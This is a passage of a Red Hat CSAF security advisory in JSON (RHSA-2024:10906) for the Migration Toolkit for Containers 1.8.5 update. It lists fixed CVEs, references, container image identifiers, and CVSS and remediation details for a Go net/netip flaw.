(CVE-2024-34155)\n\n* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:10906",
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2292787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292787"
},
{
"category": "external",
"summary": "2295310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295310"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "MIG-1458",
"url": "https://issues.redhat.com/browse/MIG-1458"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10906.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update",
"tracking": {
"current_release_date": "2024-12-18T04:37:04+00:00",
"generator": {
"date": "2024-12-18T04:37:04+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:10906",
"initial_release_date": "2024-12-10T01:37:19+00:00",
"revision_history": [
{
"date": "2024-12-10T01:37:19+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-12-10T01:37:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:37:04+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "8Base-RHMTC-1.8",
"product": {
"name": "8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhmt:1.8::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Migration Toolkit"
},
{
"branches": [
{
"category": "product_version",
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product": {
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product_id": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-controller-rhel8\u0026tag=v1.8.5-11"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product": {
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product_id": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-hook-runner-rhel8\u0026tag=v1.8.5-8"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product": {
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product_id": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-log-reader-rhel8\u0026tag=v1.8.5-8"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product": {
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product_id": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-must-gather-rhel8\u0026tag=v1.8.5-9"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product": {
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product_id": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-openvpn-rhel8\u0026tag=v1.8.5-6"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product": {
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product_id": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-rhel8-operator\u0026tag=v1.8.5-10"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product": {
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product_id": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-operator-bundle\u0026tag=v1.8.5-16"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product": {
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product_id": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-registry-rhel8\u0026tag=v1.8.5-6"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product": {
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product_id": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-rsync-transfer-rhel8\u0026tag=v1.8.5-7"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product": {
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product_id": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-ui-rhel8\u0026tag=v1.8.5-7"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product": {
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product_id": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8\u0026tag=v1.8.5-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64"
},
"product_reference": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64"
},
"product_reference": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64"
},
"product_reference": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64"
},
"product_reference": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64"
},
"product_reference": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64"
},
"product_reference": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64"
},
"product_reference": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64"
},
"product_reference": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64"
},
"product_reference": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
},
"product_reference": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
},
"product_reference": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-24790",
"cwe": {
"id": "CWE-115",
"name": "Misinterpretation of Input"
},
"discovery_date": "2024-06-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2292787"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Go language standard library net/netip. The method Is*() (IsPrivate(), IsPublic(), etc) doesn\u0027t behave properly when working with IPv6 mapped to IPv4 addresses. The unexpected behavior can lead to integrity and confidentiality issues, specifically when these methods are used to control access to resources or data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE has been marked as moderate as for our products a network-based attack vector is simply impossible when it comes to golang code,apart from that as per CVE flaw analysis reported by golang, this only affects integrity and confidentiality and has no effect on availability, hence CVSS has been marked as such.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24790"
},
{
"category": "external",
"summary": "RHBZ#2292787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292787"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24790",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24790"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
